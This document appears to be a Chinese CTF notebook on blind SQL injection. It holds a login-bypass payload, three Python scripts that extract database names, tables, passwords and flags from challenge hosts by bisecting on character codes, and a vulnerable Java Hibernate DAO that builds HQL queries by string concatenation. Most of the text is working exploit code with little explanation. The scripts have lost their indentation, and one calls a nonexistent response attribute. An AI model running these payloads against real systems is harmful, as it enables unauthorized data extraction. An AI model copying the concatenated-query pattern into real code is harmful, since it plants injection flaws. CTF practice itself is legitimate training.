盲注就是回显只有对或者错的情况(如0,1)
1' or '1'='1' group by passwd with rollup having passwd is NULL — –
测试极客大挑战finalsql
import requests
import time
g=0
host = "http://e7adeb0b-7190-4ea3-bd06-49e63e17e775.node4.buuoj.cn:81/backend/content_detail.php"
parse={'id':''}
def getDatabase(): #获取数据库名
global host
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
time.sleep(0.1)
# 1^(ascii(substr((select(database())),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(password))from(users)),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctftraining')),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema='ctftraining'(and)schema_name='ctftraining')),%d,1))<%d)^1
# 1^(ascii(substr((select(group_concat(Flag))from(ctftraining.Flag)),%d,1))<%d)^1
parse['id']="1^(ascii(substr((select(group_concat(Flag))from(ctftraining.Flag)),%d,1))<%d)^1" % (i,mid)
res = requests.get(host,params=parse)
if res.status_code!=200:
print('!200')
continue
# print(res.text)
if "title" in res.text:
high = mid
else:
low = mid+1
mid=(low+high)//2
if mid <= 32 or mid >=127:
break
if(mid-1==33):
g+=1
if(g>=5):
break
else:
g=0
ans += chr(mid-1)
print("database is -> "+ans)
getDatabase()
# news
# admin,contents
import requests
import time
url = "http://2adc3617-76d6-4705-84e4-1c0e3f21baa2.node4.buuoj.cn:81/search.php"
payload = {
"id" : ""
}
result = ""
g=0
for i in range(1,1000):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
payload["id"] = "0^" + "(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))>{1})".format(i,mid)
html = requests.post(url,params=payload)
print(payload)
if(html.code!=200):
time.sleep(0.2)
print('错误,以延迟0.2秒',html.code)
continue
# 正常的回显内容
if "others" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
#出现连续的感叹号,就停
if(mid==33):
g+=1
if(g>=5):
break
else:
g=0
print(result)
print("tables: " ,result)
有一道题的java后端代码
public class UserDaoImpl extends HibernateDaoSupport implements UserDao
{
public List<User> findUserByName(final String name) {
return (List<User>)this.getHibernateTemplate().find("from User where name ='" + name + "'");
}
public List<User> loginCheck(final String name, final String password) {
return (List<User>)this.getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
}
}
脚本
import requests
s=requests.session()
flag=''
for i in range(1,50):
p=''
for j in range(1,255):
payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
url="http://111.200.241.244:55604/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
r1=s.get(url)
if len(r1.text)>20000 and p!='':
flag+=p
print(i,flag)
break
p=chr(j)
print()